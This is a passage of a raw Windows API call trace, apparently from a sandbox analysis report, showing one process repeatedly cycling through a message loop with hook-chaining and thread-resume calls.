(hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0177.765] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0177.765] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0177.765] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0177.765] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0177.765] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0177.765] ResumeThread (hThread=0x260) returned 0x0 [0177.765] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0177.765] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0177.765] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0177.765] WaitMessage () returned 1 [0179.280] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0179.288] DefWindowProcW (hWnd=0x6013e, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0179.288] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0179.289] WaitMessage () returned 1 [0179.289] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0179.289] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0179.289] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x302c8, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0179.289] WaitMessage () returned 1 [0181.061] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0181.062] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0181.062] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0181.062] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0181.062] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0181.062] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0181.062] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0181.062] ResumeThread (hThread=0x260) returned 0x0 [0181.062] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0181.062] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0181.062] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0181.062] WaitMessage () returned 1 [0184.390] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0184.391] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0184.391] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0184.391] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0184.391] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0184.391] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0184.391] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0184.391] ResumeThread (hThread=0x260) returned 0x0 [0184.391] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0184.391] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0184.391] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0184.391] WaitMessage () returned 1 [0187.783] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0187.783] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0187.783] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0187.783] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0187.783] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0187.783] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0187.783] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0187.783] ResumeThread (hThread=0x260) returned 0x0 [0187.784] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0187.784] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0187.784] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0187.784] WaitMessage () returned 1 [0190.985] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0190.985] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0190.986] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0190.986] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0190.986] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0190.986] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0190.986] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0190.986] ResumeThread (hThread=0x260) returned 0x0 [0190.986] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0190.986] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0190.987] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0190.987] WaitMessage () returned 1 [0194.282] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0194.283] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0194.283] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0194.283] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0194.283] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0194.283] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0194.283] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0194.284] ResumeThread (hThread=0x260) returned 0x0 [0194.284] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0194.284] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0194.284] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0194.284] WaitMessage () returned 1 [0197.614] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0197.614] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0197.614] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0197.614] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0197.615] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0197.615] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0197.615] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0197.615] ResumeThread (hThread=0x260) returned 0x0 [0197.615] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0197.615] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0197.615] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0197.615] WaitMessage () returned 1 [0200.875] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0200.875] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0200.876] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0200.876] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0200.876] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0200.876] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0200.876] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0200.876] ResumeThread (hThread=0x260) returned 0x0 [0200.876] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0200.877] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0200.877] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0200.877] WaitMessage () returned 1 [0204.181] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0204.181] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0204.181] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0204.181] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0204.182] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0204.182] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0204.182] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0204.182] ResumeThread (hThread=0x260) returned 0x0 [0204.182] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0204.182] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0204.182] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0204.182] WaitMessage () [0207.474] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0207.474] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0207.474] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0207.474] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0207.474] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0207.474] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0207.475] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0207.475] ResumeThread (hThread=0x260) returned 0x0 [0207.475] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0207.475] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0207.475] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0207.475] WaitMessage () [0210.770] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0210.770] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0210.771] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0210.771] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0210.771] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0210.771] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0210.771] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0210.771] ResumeThread (hThread=0x260) returned 0x0 [0210.771] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0210.771] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0210.772] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0210.772] WaitMessage () returned 1 [0214.075] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0214.075] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0214.076] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0214.076] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0214.076] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0214.076] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0214.076] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0214.076] ResumeThread (hThread=0x260) returned 0x0 [0214.076] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0214.077] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0214.077] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0214.077] WaitMessage () returned 1 [0217.377] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0217.377] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0217.377] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0217.377] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0217.377] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0217.377] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0217.377] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0217.378] ResumeThread (hThread=0x260) returned 0x0 [0217.378] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0217.378] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0217.378] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0217.378] WaitMessage () returned 1 [0220.670] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0220.671] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0220.671] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0220.671] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0220.671] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0220.671] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0220.671] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0220.671] ResumeThread (hThread=0x260) returned 0x0 [0220.671] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0220.671] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0220.671] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0220.671] WaitMessage () returned 1 [0223.960] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0223.961] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0223.961] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0223.961] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0223.961] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0223.961] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0223.962] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0223.962] ResumeThread (hThread=0x260) returned 0x0 [0223.962] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0223.962] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0223.962] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0223.962] WaitMessage () [0227.259] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0227.259] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0227.259] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0227.259] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0227.259] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0227.259] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0227.259] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0227.259] ResumeThread (hThread=0x260) returned 0x0 [0227.259] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0227.259] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0227.259] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0227.259] WaitMessage () [0230.555] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0230.556] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0230.556] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0230.556] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0230.556] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0230.556] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0230.556] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0230.556] ResumeThread (hThread=0x260) returned 0x0 [0230.556] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0230.557] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0230.557] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0230.557] WaitMessage () [0233.856] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0233.856] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0233.856] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0233.857] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0233.857] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0233.857] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0233.857] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0233.857] ResumeThread (hThread=0x260) returned 0x0 [0233.857] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0233.857] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0233.857] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0233.857] WaitMessage () returned 1 [0237.153] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0237.154] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0237.154] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0237.154] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0237.154] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0237.154] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0237.154] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0237.154] ResumeThread (hThread=0x260) returned 0x0 [0237.155] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0237.155] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0237.155] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0237.155] WaitMessage () [0240.450] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0240.450] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0240.450] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0240.450] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0240.450] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0240.450] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0240.450] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0240.450] ResumeThread (hThread=0x260) returned 0x0 [0240.450] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0240.451] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 